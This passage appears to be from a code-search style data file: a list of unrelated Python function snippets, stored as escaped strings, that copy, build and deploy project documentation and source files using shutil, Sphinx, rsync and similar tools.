fd.readlines()\n fd.close()\n\n fd = open(os.path.join('docroot', 'doc', fname), 'w')\n skip = 0\n for ln in index_php:\n if not skip:\n fd.write(ln)\n if ln.find('/USERDOC') != -1:\n skip = 0\n fd.write(ln)\n elif ln.find('USERDOC') != -1:\n skip = 1\n for title, link in user_docs:\n fd.write('<LI><A HREF=\"%s\">%s</A>\\n'%(link, title))\n if ln.find('/DEVDOC') != -1:\n skip = 0\n fd.write(ln)\n elif ln.find('DEVDOC') != -1:\n skip = 1\n for title, link in developer_docs:\n fd.write('<LI><A HREF=\"%s\">%s</A>\\n'%(link, title))\n\n EXAMPLES = os.path.join('docroot', 'doc', 'examples.php')\n OUTEXAMPLES = os.path.join('docroot', 'examples', 'index.php')\n replace_examples_svn(EXAMPLES)\n if os.path.exists(OUTEXAMPLES):\n os.unlink(OUTEXAMPLES)\n shutil.copyfile(EXAMPLES, OUTEXAMPLES)\n\n # Copy tutorial files\n TUTORIAL_ENDINGS = ['.nib', '.py', '-src', '.h', '.m']\n tutdir = os.path.join(docdir, 'tutorial')\n files = os.listdir(tutdir)\n replacements = []\n for fn in files:\n for ext in TUTORIAL_ENDINGS:\n if fn.endswith(ext):\n dstname = os.path.join('docroot', 'doc', fn)\n replacements.append(copy_tutorial_file(fn, tutdir, dstname))\n break\n replace_tutorial_zips(os.path.join('docroot', 'doc', 'tutorial.php'), replacements)\n \n tutdir = os.path.join(docdir, 'tutorial_embed', 'src')\n files = os.listdir(tutdir)\n if not os.path.exists(os.path.join('docroot', 'doc', 'src')):\n os.mkdir(os.path.join('docroot', 'doc', 'src'))\n for fn in files:\n for ext in TUTORIAL_ENDINGS:\n if fn.endswith(ext):\n dstname = os.path.join('docroot', 'doc', 'src', fn)\n replacements.append(copy_tutorial_file(fn, tutdir, dstname))\n break\n replace_tutorial_zips(os.path.join('docroot', 'doc', 'tutorial.php'), replacements)\n\n #print \"Don't forget to update docroot/doc/tutorial.php: it's references to\"\n #print \"'step3-MainMenu.nib' and 'step12-src' should be changed to ZIP files\"", "def file_path_to_document_path(cls, source_file_path):\n pattern = PROJECT_ROOT_FOLDER.replace('\\\\', r'/') + '/'\n file_path = re.sub(pattern, '', source_file_path)\n return '{0}{1}'.format(DOCUMENT_PYTHON_FOLDER, file_path)", "def prepare_src_folder(self, src_folder: str) -> None:", "def html():\n builtdocs = path(\"docs\") / options.sphinx.builddir / \"html\"\n destdir = path(PACKAGE) / \"docs\"\n destdir.rmtree()\n builtdocs.move(destdir)", "def deploy_nucleondocs():\n\n # Copy generated docs to docs_webserver on target machine\n rsync_project(\n remote_dir= '/srv/docs_webserver/docs/nucleon/',\n local_dir=join(dirname(__file__), 'docs/_build/html/'),\n delete=True)", "def copy_files(self):\n files = ['LICENSE.md', 'CONTRIBUTING.md']\n this_dir = sh.pwd().strip()\n for _file in files:\n sh.cp(\n '{0}/templates/{1}'.format(this_dir, _file),\n '{0}/'.format(self.book.textdir)\n )", "def copydoc(self, doc):\n dst = os.path.join(self.path, os.path.split(doc)[1])\n if not self.rc.force and os.path.isfile(dst):\n raise RuntimeError(dst + \" already exists!\")\n shutil.copy2(doc, dst)\n return dst", "def copydocs(store, path, rc):\n for doc in rc.documents:\n dst = os.path.join(path, os.path.split(doc)[1])\n if not rc.force and os.path.isfile(dst):\n raise RuntimeError(dst + \" already exists!\")\n shutil.copy2(doc, dst)", "def make_source_dir():\n\n os.makedirs(files['source_dir'].rel)", "def copy_source():\n shutil.copytree(\"src\", os.path.join(BUILD_DIR, \"src\"))\n for file in os.listdir(\".\"):\n if os.path.isfile(file):\n shutil.copyfile(file, os.path.join(BUILD_DIR, file))", "def copydir(self):\n pass", "def move(self, **kwargs):\n if os.path.exists(self.old_artifact_path):\n if os.path.exists(self.target):\n shutil.rmtree(self.target)\n log.info(\"Copying %s on the local filesystem\" % self.type)\n shutil.copytree(self.old_artifact_path, self.target)\n else:\n log.warning(\"Not moving docs, because the build dir is unknown.\")", "def clean_docs(c):\n c.run(f\"rm -fr {DOCS_BUILD_DIR}\")", "def copy_files():\n os.makedirs('build/usr/lib/python3/dist-packages', exist_ok=True)\n os.makedirs('build/usr/share/doc', exist_ok=True)\n\n shutil.copytree('applications', 'build/usr/share/applications')\n shutil.copytree('doc', 'build/usr/share/doc/qastetray')\n shutil.copytree('icons', 'build/usr/share/icons')\n shutil.copytree('locale', 'build/usr/share/locale')\n shutil.copytree('qastetray',\n 'build/usr/lib/python3/dist-packages/qastetray')", "def copyFiles(self, package):\n styleFiles = [self.stylesDir/'..'/'base.css']\n\tstyleFiles += [self.stylesDir/'..'/'popup_bg.gif']\n styleFiles += self.stylesDir.files(\"*.css\")\n if \"nav.css\" in styleFiles:\n styleFiles.remove(\"nav.css\")\n styleFiles += self.stylesDir.files(\"*.jpg\")\n styleFiles += self.stylesDir.files(\"*.gif\")\n styleFiles += self.stylesDir.files(\"*.png\")\n styleFiles += self.stylesDir.files(\"*.js\")\n styleFiles += self.stylesDir.files(\"*.html\")\n self.stylesDir.copylist(styleFiles, self.outputDir)\n package.resourceDir.copyfiles(self.outputDir)\n self.scriptsDir.copylist(('libot_drag.js', 'common.js'), \n self.outputDir)\n self.templatesDir.copylist(('videoContainer.swf', 'magnifier.swf',\n 'xspf_player.swf'),self.outputDir)\n (self.templatesDir/'fdl.html').copyfile(self.outputDir/'fdl.html')", "def upload():\n env.user = 'webcontent'\n rsync_project(DOCDIR, 'doc/_build/html/', delete=True)", "def generate_docs(root_dir, session):\n ...", "def update_spx_source(src=\"\"):\n\n # delete old spx_prj source\n p_spxsrc = p(spx_src_dir)\n if p_spxsrc.is_dir():\n shutil.rmtree(p_spxsrc)\n p_spxsrc.mkdir()\n\n # prepare new spx_prj source dir\n p_spxsrc_org = p(str(p_spxsrc) + \"_org\")\n list_src = p_spxsrc_org.glob(\"**/*\")\n _listprint(list_src)\n du.copy_tree(str(p_spxsrc_org), str(p_spxsrc))\n\n # copy doc source\n list_src = src.glob(\"**/*\")\n _listprint(list_src)\n\n du.copy_tree(str(src), str(p_spxsrc))", "def build_docs(session):\n envbindir = session.bin\n session.install(\"-e\", \".[all,docs]\")\n with session.chdir(\"docs/\"):\n session.run(\n \"sphinx-autobuild\",\n \"-j\",\n \"auto\",\n \"--open-browser\",\n \"-qT\",\n \".\",\n f\"{envbindir}/../tmp/html\",\n )", "def doc(self):\n from distutils.dir_util import copy_tree\n\n def copy_tree_checker(src, dst):\n \"\"\"Wrap copy_tree to avoid pydoit error.\"\"\"\n copy_tree(src, dst)\n return True\n\n return {\n \"actions\": [\n (create_dir, [\"build/doc/source\"]),\n (copy_tree_checker, [\"docs\", \"build/doc/source\"]),\n TaskCreator.get_sphinx() + \"-apidoc -o build/doc/source --force --separate --module-first \" + self.project_name_sc,\n TaskCreator.get_sphinx() + \"-build -j auto -n build/doc/source build/doc/html\"\n ],\n \"verbosity\": 2\n }", "def deploy_sphinx_docs():\n require('docs_root', 'docs_install_dir')\n sphinx.build_html_docs(env.docs_root)\n sudo('mkdir -p {}'.format(env.docs_install_dir))\n sphinx.deploy_html_docs(env.docs_root,\n env.docs_install_dir)", "def test_docdir(self):\n self.chck_triple('docdir')", "def nixos():\n MSG = \"Agda-pkg will copy the following files to the current directory.\"\n click.echo(MSG)\n for file in SUPPORT_FILES_PATH.iterdir():\n print(file.as_posix())\n if click.confirm('Do you want to proceed?'):\n pwd = Path().cwd()\n copy_tree(SUPPORT_FILES_PATH.as_posix(), pwd.as_posix(), update=1, verbose=1)", "def _enableCustomSourcesFolder():\n configroot = join(expanduser(\"~\"), \".wesen\")\n sourcefolder = join(configroot, \"sources\")\n if(not exists(configroot)):\n mkdir(configroot)\n if(not exists(sourcefolder)):\n mkdir(sourcefolder)\n sys.path.append(sourcefolder)", "def update_docs():\n site_path = os.path.join(PROJECTS_ROOT, CURRENT_SITE)\n docs_path = os.path.join(site_path, 'doc_src')\n with cd(docs_path):\n run('git reset --hard && git pull --all')\n run('workon djangopatterns && cd doc_src && make clean')\n run('workon djangopatterns && cd doc_src && make json')", "def create_source(self, source):\n if not os.path.isdir(source):\n os.makedirs(source)\n # Create a text file in the source directory.\n text_file = os.path.join(source, 'notes.txt')\n with open(text_file, 'w') as handle:\n handle.write(\"This file should be included in the backup.\\n\")\n # Create a subdirectory in the source directory.\n subdirectory = os.path.join(source, 'subdirectory')\n os.mkdir(subdirectory)\n # Create a symbolic link in the subdirectory.\n symlink = os.path.join(subdirectory, 'symbolic-link')\n os.symlink('../include-me.txt', symlink)", "def generate():\n local('cd doc && make clean && make html')", "def docs_root():\n start, result = get_docs_root()\n if result is None:\n pytest.skip(f\"No directory '{DOCS_DIR}' found from '{start}'\")\n yield result", "def conditional_copy(asciitest_out_dir, doc_file):\n # path join uses backslash win32 which is not cmake compatible\n\n filename = save_cmake_filename(doc_file)\n\n filename1 = os.path.join(asciitest_out_dir, filename + \".temp\").replace(\"\\\\\",\"/\")\n filename2 = os.path.join(asciitest_out_dir, filename).replace(\"\\\\\",\"/\")\n\n update_if_different(filename1, filename2)", "def pandoc_s2s(app, docname, source):\n\n enabled_extensions = app.config.pandoc_s2s_formats\n\n noextpath = os.path.join(app.srcdir, docname)\n if not os.path.exists(noextpath + \".rst\"):\n for ext in enabled_extensions:\n if os.path.exists(noextpath + ext):\n source[0] = pypandoc.convert_file(noextpath + ext, \"rst\")\n break", "def copy_source_files(or_dir,template_dir): \n def copy_sc(file,fpA,fpB):\n fpA = os.path.join(fpA,file)\n if os.path.isfile(fpA):\n shutil.copy(fpA,fpB)\n else:\n raise Exception(\"Error: File '{}' is missing\".format(file))\n return\n \n copy_sc('imta_core.sty',or_dir,template_dir)\n copy_sc('imta_extra.sty',or_dir,template_dir)\n copy_sc('imta_logo.pdf',or_dir,template_dir)\n copy_sc('imta_documentation.tex',or_dir,template_dir)\n print('Template files copied at {}'.format(template_dir))", "def full_doc_path(self, version='latest'):\n doc_base = self.checkout_path(version)\n for possible_path in ['docs', 'doc', 'Doc']:\n if os.path.exists(os.path.join(doc_base, '%s' % possible_path)):\n return os.path.join(doc_base, '%s' % possible_path)\n #No docs directory, docs are at top-level.\n return doc_base", "def vendor_robocorp_ls_core(self):\n import shutil\n\n src_core = os.path.join(\n os.path.dirname(__file__),\n \"..\",\n \"robocorp-python-ls-core\",\n \"src\",\n \"robocorp_ls_core\",\n )\n vendored_dir = self.remove_vendor_robocorp_ls_core()\n print(\"Copying from: %s to %s\" % (src_core, vendored_dir))\n\n shutil.copytree(src_core, vendored_dir)\n print(\"Finished vendoring.\")", "def copy_drafts():\r\n draft_dir = path(source_dir) / course_name / DRAFT_DIR\r\n if draft_dir.isdir():\r\n shutil.copytree(draft_dir, copy_root / DRAFT_DIR)", "def build_docs(open_docs):\n python_call(\"pip\", [\"install\", \"src/[docs]\"])\n python_call(\"pip\", [\"install\", \"-r\", \"src/requirements.txt\"])\n python_call(\n \"ipykernel\", [\"install\", \"--user\", \"--name=za_covid_map\"]\n )\n shutil.rmtree(\"docs/build\", ignore_errors=True)\n call(\n [\n \"sphinx-apidoc\",\n \"--module-first\",\n \"-o\",\n \"docs/source\",\n \"src/za_covid_map\",\n ]\n )\n call([\"sphinx-build\", \"-M\", \"html\", \"docs/source\", \"docs/build\", \"-a\"])\n if open_docs:\n docs_page = (Path.cwd() / \"docs\" / \"build\" / \"html\" / \"index.html\").as_uri()\n secho(\"Opening {}\".format(docs_page))\n webbrowser.open(docs_page)", "def createBaseFolder(self):\n if not os.path.isdir(self.gdocs_folder):\n os.mkdir(self.gdocs_folder, 0755)", "def create_license(self) -> None:\n # copy the license file from the template to the package folder\n # option : append other license files\n shutil.copy(CONFIG.template_path / \"LICENSE.md\", self.package_path)", "def documents():\n for domain in os.listdir(DOCUMENT_FOLDER):\n for docname in os.listdir(os.path.join(DOCUMENT_FOLDER, domain)):\n filename = os.path.join(DOCUMENT_FOLDER, domain, docname)\n if filename.endswith(\".html\"):\n fullDocname = os.path.join(domain, docname)\n yield (fullDocname, filename)", "def build_docs(source, destination, doctrees):\n sphinx_argv = [\n '-b', 'html',\n '-d', doctrees,\n source,\n destination]\n\n sphinx_main(['sphinx-build'] + sphinx_argv)", "def docs():\n sh('sphinx-build -W -b html docs docs/_build/html')", "def do_build():\n tmp_dir = Path(tempfile.mkdtemp())\n (tmp_dir / \"integrations-docs.js\").write_text(render_js_module(collect_docs(), *collect_metrics(), collect_meta()))\n\n symlink_images(tmp_dir)\n\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n tmp_dir.replace(OUT_DIR)", "def pre_install(self, dest_dir):\n pass", "def _copy_sources():\n shutil.rmtree(SRC_DIR_LOCAL, ignore_errors=True)\n os.mkdir(SRC_DIR_LOCAL)\n\n shutil.copy(os.path.join(SRC_DIR_REPO, 'LICENSE.txt'), SRC_DIR_LOCAL)\n shutil.copy(os.path.join(SRC_DIR_REPO, 'z3.pc.cmake.in'), SRC_DIR_LOCAL)\n shutil.copy(os.path.join(SRC_DIR_REPO, 'CMakeLists.txt'), SRC_DIR_LOCAL)\n shutil.copytree(os.path.join(SRC_DIR_REPO, 'cmake'), os.path.join(SRC_DIR_LOCAL, 'cmake'))\n shutil.copytree(os.path.join(SRC_DIR_REPO, 'scripts'), os.path.join(SRC_DIR_LOCAL, 'scripts'))\n\n # Copy in src, but avoid recursion\n def ignore_python_setup_files(src, _):\n if os.path.normpath(src).endswith('api/python'):\n return ['core', 'dist', 'MANIFEST', 'MANIFEST.in', 'setup.py', 'z3_solver.egg-info']\n return []\n shutil.copytree(os.path.join(SRC_DIR_REPO, 'src'), os.path.join(SRC_DIR_LOCAL, 'src'),\n ignore=ignore_python_setup_files)", "def copy_static(self, outdir):\n pass", "def add_files(cls, document, source_files):\n with zipfile.ZipFile(document, 'a') as open_document:\n for src_file in source_files:\n open_document.write(src_file, Manifest.file_path_to_document_path(src_file))", "def make_document(source_path=\"notset\") -> nodes.document:\n settings = OptionParser(components=(RSTParser,)).get_default_values()\n return new_document(source_path, settings=settings)", "def set_source_path(self, folder):\n self.source_path = folder", "def copy(self, target):\r\n py.process.cmdexec(\"svn copy %s %s\" %(str(self), str(target)))", "def generate_documentation(self):\n self.generate_api_docs()\n build.main([\n self.SOURCE_DIR,\n self.BUILD_DIR,\n ])", "def pushDocsFromDir(docDir):\n\tfor i in os.listdir(docDir):\n\t\tif not(i.endswith(\".DS_Store\")):\n\t\t\tif not(docDir.endswith(\"/\")):\n\t\t\t\tfilename = (docDir+\"/\"+i)\n\t\t\telse:\n\t\t\t\tfilename = docDir + i\n\t\t\tpushDocumentToPhone(filename)\n\n\tprint \"Finished pushing files.\"", "def doc2path(self, docname, base=True, suffix=None):\n if docname.startswith(\":cfg:\"):\n docname = os.path.join(self.srcdir, \"..\", docname[5:])\n\n if suffix:\n return old_doc2path(self, docname, base, suffix)\n\n for suffix in (\".yay\", \".rst\"):\n path = old_doc2path(self, docname, base, suffix)\n if os.path.exists(path):\n break\n\n return path", "def bootstrap_development_distribution(project_name: str, dest_dir: Path):\n src_dir = Path(__file__).parent.parent.absolute()\n print(f\"Bootstrap: {src_dir} -> {dest_dir}\")\n shutil.copytree(\n src_dir,\n dest_dir,\n ignore=shutil.ignore_patterns(\n project_name.lower(),\n \".git\",\n \"build\",\n \"dist\",\n \"docs\",\n \".pytest_cache\",\n \".eggs\",\n \"templates\",\n \"__pycache__\",\n ),\n )", "def build_docs(options):\r\n verbose = getattr(options, 'verbose', False)\r\n\r\n cmd = \"cd {dir}; make html quiet={quiet}\".format(\r\n dir=doc_path(options),\r\n quiet=\"false\" if verbose else \"true\"\r\n )\r\n\r\n sh(cmd)", "def offline_copy(_export_path):\n global export_path\n export_path = _export_path\n \n # First, monkey patch the original config\n main.NBCONFIG.protectect_dirs = []\n main.NBCONFIG.protected_users = {}\n main.NBCONFIG.edit_users = {}\n \n # Now monkey patch NBweb\n main.REQUIRELOGIN = False\n\n pages = []\n\n # Copy and work all source files \n for dirpath,dirnames,filenames in os.walk(NBCONFIG.source):\n for dirname in dirnames[:]: # Iterate a copy since we will delete in place\n if any(dirname.startswith(i) for i in ['.']):\n dirnames.remove(dirname) # So we do not parse it later\n continue\n if dirname == '_scratch':\n dirnames.remove(dirname) # So we do not parse it later\n continue\n \n # Names\n src_systemname = os.path.join(dirpath,dirname)\n rootname = os.path.relpath(src_systemname,NBCONFIG.source) # No leading / though\n dest_systemname = os.path.join(export_path,rootname)\n \n mkdir(rootname,isfile=False) # Will make the dir no matter what\n \n # Index\n dest = os.path.join(export_path,rootname, 'index.html')\n \n # Exclusions.\n if main.exclusion_check(utils.join('/',rootname +'/')):\n with open(dest,'w',encoding='utf8') as FF:\n FF.write('')\n continue\n \n try:\n html = main.main_route('/' + rootname + '/')\n except HTTPError:\n # Likely some additional resource in _NBweb\n try:\n os.rmdir(dest_systemname) # Should be empty\n except OSError:\n pass\n os.symlink(src_systemname,dest_systemname)\n continue\n \n \n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n # _all\n dest = os.path.join(export_path,'_all',rootname, 'index.html')\n mkdir(dest,isfile=True,isfull=True)\n \n html = main.allpage('/'+ rootname +'/')\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n \n # Loop each file\n for filename in filenames:\n if os.path.splitext(filename)[0] == 'index':\n continue # Already made above\n \n # Names\n src_systemname = os.path.join(dirpath,filename)\n rootname = os.path.relpath(src_systemname,NBCONFIG.source) # No leading / though\n dest_systemname = os.path.join(export_path,rootname)\n \n mkdir(rootname,isfile=True) # Will make the dir no matter what\n try:\n os.symlink(src_systemname,dest_systemname) \n except OSError:\n os.remove(dest_systemname)\n os.symlink(src_systemname,dest_systemname)\n \n rootbasename,ext = os.path.splitext(rootname)\n if ext in NBCONFIG.extensions:\n dest = os.path.join(export_path,rootbasename + '.html')\n try:\n html = main.main_route(rootbasename + '.html')\n except:\n print('Issue with: {}'.format(rootname))\n \n html = process_page(html,dest)\n \n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n pages.append(rootbasename)\n\n ## Index pages\n # Home page w/o blog\n dest_systemname = os.path.join(export_path,'')\n dest = os.path.join(export_path,'index.html')\n \n html0 = main.main_route('/',map_view=True)\n \n html = process_page(html0,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n\n # Also write the sitemap\n dest = os.path.join(export_path,'_sitemap/index.html')\n mkdir('/_sitemap',isfile=False)\n html = process_page(html0,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n # _all\n dest = os.path.join(export_path,'_all','index.html')\n \n html = main.allpage('/')\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n ## Blog Pages\n if len(NBCONFIG.blog_dirs) > 0:\n blog_num = 0\n while True:\n dest = os.path.join(export_path,'_blog',unicode(blog_num),'index.html')\n \n try:\n html = main.main_route('/',map_view=False,blog_num=blog_num)\n except HTTPError:\n break # At the last one\n \n mkdir(dest,isfile=True,isfull=True) \n \n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n blog_num += 1\n # Make the home page. \n dest = os.path.join(export_path,'index.html')\n html = main.main_route('/',map_view=False,blog_num=0)\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n ## Special Pages\n make_random_forward(pages)\n \n # Tags\n dest = os.path.join(export_path,'_tags/index.html')\n mkdir(dest,isfile=True,isfull=True) \n html = main.return_tags()\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n # ToDos\n dest = os.path.join(export_path,'_todo/index.html')\n mkdir(dest,isfile=True,isfull=True) \n html = main.return_todo()\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n txt = main.return_todo_txt()\n dest = os.path.join(export_path,'_todo/todo.txt')\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(txt)\n \n # Galleries\n cpsym( utils.join(NBCONFIG.scratch_path,'_galleries'),utils.join(export_path,'_galleries'))\n \n ## Clean up\n for F in [utils.join(export_path,'_NBweb',a) for a in ['NBCONFIG.py','NBCONFIG.pyc','template.html']]:\n try:\n os.remove(F)\n except:\n pass\n \n # Make sure there are never any directory listings\n for dirpath,dirnames,filenames in os.walk(export_path):\n if 'index.html' not in filenames:\n with open(utils.join(dirpath,'index.html'),'w',encoding='utf8') as F:\n F.write('')", "def build_folders(source, destination_temp, standard, root):\n\n source_fs = OSFS(source)\n\n print \"Processing %s ... \" % standard['id']\n standard_fs = source_fs.opendir(standard['id'])\n\n # list all artifacts of a standard\n artifacts = standard_fs.listdir(dirs_only=True)\n if '.git' in artifacts: artifacts.remove(\".git\")\n\n for artifact in artifacts:\n # check whether artifact folder exists in destination_temp \n if root.exists('%s/%s' % (destination_temp, artifact)) == False:\n root.makedir('%s/%s' % (destination_temp, artifact))\n\n # copy standard folders from source to destination_temp in desired structure\n root.copydir('%s/%s/%s' % (source, standard['id'], artifact), '%s/%s/%s' % (destination_temp, artifact, standard['id']))\n\n html = create_standard_webpage(standard, artifacts)\n\n # check whether register/standard exists\n if root.exists('%s/%s' % (destination_temp, standard['id'])) == False:\n root.makedir('%s/%s' % (destination_temp, standard['id']))\n \n # write standard HTML page to register/standard/index.html\n with codecs.open('%s/%s/index.html' % (destination_temp, standard['id']), 'w', encoding='utf8') as f:\n f.write(html)\n\n # copy web assets\n root.copydir('web/assets', '%s/r' % destination_temp, overwrite=True)", "def set_domain_path(self):\n\n self.domain_path = os.path.join(self.docs_path, self.domain)\n if not os.path.exists(self.domain_path):\n os.makedirs(self.domain_path)", "def generate_api_docs(self):\n if self.API_OUTPUT_DIR:\n args = [\n # Put documentation for each module on its own page\n '-e',\n # don't create the \"modules.rst\" file (the table of contents\n # file) as this is already provided by the package's main rst\n # file.\n '-T',\n # Overwrite existing files\n '--force',\n '-o', self.API_OUTPUT_DIR,\n # the package to generate docs from\n self.PROJECT_DIR\n ]\n excludes = [\n os.path.join(self.PROJECT_DIR, p)\n if not os.path.isabs(p) else p\n for p in self.API_EXCLUDE_DIRS\n ]\n apidoc.main(args + excludes)", "def copy_reports(ctx):\n log = Path('./log.html')\n report = Path('./report.html')\n dest = Path('.') / 'reports'\n print(log.absolute())\n shutil.copy(log.absolute(), str(dest))\n print(report.absolute())\n shutil.copy(report.absolute(), str(dest))", "def copy_helper(project_name, directory):\n # Read the templates for projects\n template_dir = os.path.join(qisrc.QISRC_ROOT_DIR, \"templates\", \"project\")\n template_dir = os.path.abspath(template_dir)\n\n for file_name in os.listdir(template_dir):\n with open(os.path.join(template_dir, file_name), \"r\") as old_file:\n old_contents = old_file.read()\n new_contents = old_contents.replace(\"@project_name@\", project_name)\n with open(os.path.join(directory, file_name), \"w\") as new_file:\n new_file.write(new_contents)", "def copy_to_ocr(doc_dict):\n try:\n\n # check if document directory in OCR input directory exists\n if not os.path.exists(os.path.join(config.TOC_OCR_IN, doc_dict['name'])):\n # create missing directories\n os.makedirs(os.path.join(config.TOC_OCR_IN, doc_dict['name']))\n except:\n raise IOError(f\"{format(datetime.now(), '%Y-%m-%d %H:%M:%S')} ERROR (OCR): Failed to create directory {os.path.join(config.TOC_OCR_IN,doc_dict['name'])} in {config.TOC_OCR_IN}...\")\n\n for item in doc_dict['toc']:\n\n # check if file referenced in dictionary is really in the document root directory\n if not os.path.isfile(item):\n\n # raise an exception if the isn't\n raise IOError(f\"{format(datetime.now(), '%Y-%m-%d %H:%M:%S')} ERROR (OCR): File {item} is not in the document directory {doc_dict['path']}...\")\n\n try:\n # copy file to document directory in OCR input directory\n shutil.copy2(src=item, dst=os.path.join(config.TOC_OCR_IN, doc_dict['name']))\n except:\n\n # raise exception if error occurs during copying\n raise IOError(f\"{format(datetime.now(), '%Y-%m-%d %H:%M:%S')} ERROR (OCR): Failed to copy {item} to {os.path.join(config.TOC_OCR_IN, doc_dict['name'])}...\")", "def write_api_docs(self, outdir):\r\n if not os.path.exists(outdir):\r\n os.mkdir(outdir)\r\n # compose list of modules\r\n modules = self.discover_modules()\r\n self.write_modules_api(modules,outdir)", "def copy():\n put(os.path.join('dist', get_egg_name()), remote_egg_dir)", "def __copyFiles(self):\n if os.path.isdir(self.__sourcePath):\n shutil.copytree(self.__sourcePath, self.__targetPath)\n else:\n shutil.copy2(self.__sourcePath, self.__targetPath)", "def makeDocFile(self):\n\n f_out = \"%s/%s-doc.php\" % (self.dir_out, self.project_id)\n version = max(self.versions)\n\n with open(f_out, 'w') as f:\n f.write(\"<!DOCTYPE html>\\n\" \\\n \"<html xmlns=\\\"http://www.w3.org/1999/xhtml\\\">\\n\" \\\n \"<head>\\n\" \\\n \"<meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\"/>\\n\" \\\n \"\\n\" \\\n \"<title>Kit&Pack − Ultimate Power Booster</title>\\n\" \\\n \"<link rel=\\\"shortcut icon\\\" type=\\\"image/png\\\" href=\\\"../favicon.png\\\"/>\" \\\n \"<link rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"../css/doc-2.css\\\" />\\n\"\n \"\\n\" \\\n \"</head>\\n\" \\\n \"<body>\\n\" \\\n \"\\n\" \\\n \"<h1>Ultimate Power Booster</h1>\" \\\n \"\\n\")\n\n # Write a list of other versions of the documentation\n f.write(\"<p>Versions de cette documentation.</p>\\n\")\n f.write(\"<ul>\\n\")\n for v in self.versions:\n f.write(\"\\t<li><a href=\\\"%s.php\\\">%s</a></li>\\n\" % (\n v, v))\n f.write(\"</ul>\\n\\n\")\n\n f.write(\"<?php\\n\" \\\n \"include(\\\"%s.php\\\")\\n\" \\\n \"?>\\n\" \\\n \"\\n\" \\\n \"</body>\\n\" \\\n \"</html>\" % (version))", "def copy_dir(dirf,dir2,fromapp,toapp):\n import glob\n fls=glob.glob(dirf+\"/*.F90\")\n for f in fls:\n nf=f.replace(fromapp,toapp)\n copy_file(f,nf,fromapp,toapp)\n #copy the cmake file\n fromf=dirf+'/CMakeLists.txt'\n tof=dir2+'/CMakeLists.txt'\n copy_file(fromf,tof,fromapp,toapp)", "def copy_static(root_directory, dist_directory, sdk_directory):\n\n for static in configuration.STATICS:\n context = {\n \"root\": root_directory,\n \"sdk\": sdk_directory,\n \"dist\": dist_directory\n }\n\n source = templates.from_string(static[\"source\"], context)\n target = templates.from_string(static[\"target\"], context)\n target = os.path.join(dist_directory, target)\n\n # Perform the action.\n sys.stdout.write(\"Copying '%s'\\n\" % source)\n\n if static[\"type\"] == \"directory\":\n recursive_overwrite(source, target)\n else:\n shutil.copy(source, target)", "def _generate_custom(project, docdir, gendir):\n custom_dir = os.path.join(docdir, 'generate')\n print(f\"Generating custom docs for {project} in {gendir!r}\")\n\n for root, _dirs, files in os.walk(custom_dir):\n subdir = root.split(custom_dir, 1)[1].strip('/')\n if subdir:\n try:\n os.mkdir(os.path.join(gendir, subdir))\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n for script in sorted(x for x in files if not x.startswith(('.', '_'))):\n script_path = os.path.join(custom_dir, subdir, script)\n if not os.access(script_path, os.X_OK):\n continue\n\n fake_file = StringIO()\n with syspath(os.path.dirname(script_path)):\n module = import_module(os.path.basename(os.path.splitext(script_path)[0]))\n module.main(fake_file, docdir=docdir, gendir=gendir)\n\n fake_file.seek(0)\n if data := fake_file.read():\n rst = os.path.join(gendir, subdir, os.path.splitext(script)[0] + '.rst')\n print(f\"generating {rst}\")\n with open(rst, 'w') as f:\n f.write(data)", "def copy_support_files() -> None:\n # root folder files\n filelist = {\"favicon128.png\",\n \"favicon96.png\",\n \"favicon72.png\",\n \"favicon48.png\",\n \"favicon32.png\",\n \"favicon24.png\",\n \"favicon16.png\",\n \"favicon.ico\",\n \"apple-touch-icon.png\",\n \"apple-touch-icon-precomposed.png\",\n \"apple-touch-icon-72x72.png\",\n \"apple-touch-icon-72x72-precomposed.png\",\n \"apple-touch-icon-114x114.png\",\n \"apple-touch-icon-114x114-precomposed.png\",\n \"apple-touch-icon-144x144.png\",\n \"apple-touch-icon-144x144-precomposed.png\",\n \"uca_style.css\"}\n for filename in filelist:\n try:\n shutil.copy2(\"resources/\" + filename, WEBOUT_PATH)\n except FileNotFoundError:\n report_error(\"Missing file: resources/\" + filename)\n # image folder files\n filelist = {\"film.png\",\n \"stylifera75.png\",\n \"DOI_logo.svg\",\n \"size_hist.png\",\n \"size_ind.png\",\n \"size_mean.png\",\n \"size_range.png\",\n \"size_summary.png\",\n \"double_clawed.jpg\"}\n for filename in filelist:\n try:\n shutil.copy2(\"resources/images/\" + filename, WEBOUT_PATH + \"images/\")\n except FileNotFoundError:\n report_error(\"Missing file: resources/images/\" + filename)\n filelist = {\"specific_word_cloud.png\",\n \"binomial_word_cloud.png\"}\n for filename in filelist:\n try:\n shutil.copy2(TMP_PATH + filename, WEBOUT_PATH + \"images/\")\n except FileNotFoundError:\n report_error(\"Missing file: \" + TMP_PATH + filename)\n # font-awesome files\n filelist = {\"fontawesome.min.js\",\n \"brands.min.js\",\n \"regular.min.js\",\n \"solid.min.js\"}\n for filename in filelist:\n try:\n shutil.copy2(\"resources/font-awesome/js/\" + filename, WEBOUT_PATH + \"js/\")\n except FileNotFoundError:\n report_error(\"Missing file: resources/font-awesome/js/\" + TMP_PATH + filename)\n # flag-icon files\n filelist = {\"flag-icons.min.css\"}\n for filename in filelist:\n try:\n shutil.copy2(\"resources/flag-icon-css/css/\" + filename, WEBOUT_PATH + \"images/flag-icon-css/css/\")\n except FileNotFoundError:\n report_error(\"Missing file: images/flag-icon-css/css/\" + TMP_PATH + filename)\n filelist = {\"de.svg\", # Germany\n \"es.svg\", # Spain\n 